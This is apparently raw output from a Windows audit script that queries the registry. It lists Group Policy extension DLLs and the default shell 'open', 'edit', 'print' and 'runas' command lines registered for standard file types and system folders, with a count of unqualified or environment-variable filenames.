@C:\Windows\System32\iedkcs32.dll,-3051 DllName REG_SZ C:\Windows\System32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CFF649BD-601D-4361-AD3D-0FC365DB4DB7} DllName REG_EXPAND_SZ %SystemRoot%\system32\domgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27} DisplayName REG_EXPAND_SZ @C:\Windows\System32\polstore.dll,-5012 DllName REG_EXPAND_SZ %SystemRoot%\System32\polstore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E47248BA-94CC-49c4-BBB5-9EB7F05183D0} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-18 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E4F48E54-F38D-4884-BFB9-D4D2E5729C18} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-19 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E5094040-C46C-4115-B030-04FB2E545B00} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-20 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E5094040-C46C-4115-B030-04FB2E545B00} DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E62688F0-25FD-4c90-BFF5-F508B9D2E31F} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-21 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{F312195E-3D9D-447A-A3F5-08DFFA24735E} DisplayName REG_EXPAND_SZ @dggpext.dll,-600 DllName REG_EXPAND_SZ dggpext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{f3ccc681-b74c-4060-9f26-cd84525dca2a} DisplayName REG_EXPAND_SZ @auditcse.dll,-3000 DllName REG_EXPAND_SZ auditcse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{F9C77450-3A41-477E-9310-9ACD617BD9E3} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-15 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{FB2CA36D-0B40-4307-821B-A13B252DE56C} DisplayName REG_EXPAND_SZ @gptext.dll,-203 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{fbf687e6-f063-4d9f-9f4f-fd9a26acdd5f} DisplayName REG_EXPAND_SZ @gptext.dll,-205 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{FC491EF1-C4AA-4CE1-B329-414B101DB823} DisplayName REG_EXPAND_SZ @dggpext.dll,-600 DllName REG_EXPAND_SZ dggpext.dll End of search: 99 match(es) found.Note: 67 of these 99 filenames are either unqualified or contain an environment variable.
All command lines registered with Programmatic Identifiers or Client Types:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "Command" /K /S /VE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Application.Manifest\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Application.Reference\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut %1|%2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\mspaint.exe\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\notepad.exe\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\notepad.exe\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\photoviewer.dll\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\provtool.exe\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wordpad.exe\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioCD\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:3 /device:AudioCD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmd.exe /C "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\brmFile\shell\Open\command (Default) REG_SZ "PrintBrmUI.exe" /import /file:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\Shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\campfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CATFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cdmpfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CERFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddCER %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CERFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CertificateStoreFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\certificate_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\hh.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0AFACED1-E828-11D1-9187-B532F1E9575D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\OpenWithoutDiagnostics\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN /disablediagnostics HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rstrui.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\telephon.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ea4f148-308c-46d7-98a9-49041b1dd468}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mblctr.exe /open HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67718415-c450-4f3c-bf8a-b487642dc39b}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\optionalfeatures.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl,@1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}\Shell\Open\Command (Default) REG_EXPAND_SZ netplwiz.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80F3F1D5-FECA-45F3-BC32-752C152E456E}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\tabletpc.cpl @1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\NoAddOns\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -extoff HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\pwcreator.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\inetcpl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2C761C6-29BC-4f19-9251-E6195265BAF1}\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\colorcpl.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\changehomegroupsettings\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\sharewithdevices\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.NetworkAndSharingCenter /page ShareMedia HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\starthomegrouptroubleshooter\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\msdt.exe -id HomegroupDiagnostic HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\viewhomegrouppassword\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup /page Passkey HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.DefaultPrograms HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\tabletpc.cpl @0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmd.exe /C "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\Shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\cplopen\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe "%1",%* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,Control_RunDLLAsUser "%1",%* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CRLFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddCRL %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CRLFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\desktopthemepackfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\AllItems\Shell\Microsoft.DxpOpen\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\AllItems\Shell\Microsoft.DxpOpenInNewWindow\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{0850302A-B344-4fda-9BE9-90576B8D46F0}\Shell\Bluetooth\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\bthprops.cpl,,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{70FFD812-4C7F-4C7D-926A-637B7DD852AF}\Shell\DeviceInstall\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\newdev.dll,DeviceInternetSettingUi 2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{884b96c3-56ef-11d1-bc8c-00a0c91405dd}\Shell\Regional\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe %SystemRoot%\System32\intl.cpl,,/p:"keyboard" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Cabinet\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /cab "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /path "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /path "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /sys /load "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /sys /open "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Resmon.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /res /load "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\background\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\background\shell\Powershell\command (Default) REG_SZ powershell.exe -noexit -command Set-Location -literalPath '%V' HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Powershell\command (Default) REG_SZ powershell.exe -noexit -command Set-Location -literalPath '%V' HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dlna-playsingle\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-passphrase\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdechangepin.exe -pw %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-pin\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdechangepin.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizard.exe %1 T HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde-elev\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizardElev.exe %1 T HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\manage-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe /name Microsoft.BitLockerDriveEncryption /page ?InitialVolume==%1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\Powershell\command (Default) REG_SZ powershell.exe -noexit -command Set-Location -literalPath '%V' HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizard.exe %1 V HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde-elev\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizardElev.exe %1 V HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\unlock-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdeunlock.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\eventvwr.exe /l:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtxfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\eventvwr.exe /l:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.BurnSelection\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.EraseDisc\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.ZipSelection\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocProtocol.search-ms\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FaxCover.Document\shell\open\command (Default) REG_SZ C:\Windows\System32\fxscover.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FaxCover.Document\shell\print\command (Default) REG_SZ C:\Windows\System32\fxscover.exe /P "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FindApp.DVD\Shell\Play\command (Default) REG_EXPAND_SZ explorer "ms-windows-store://search/?query=DVD" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ftp\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 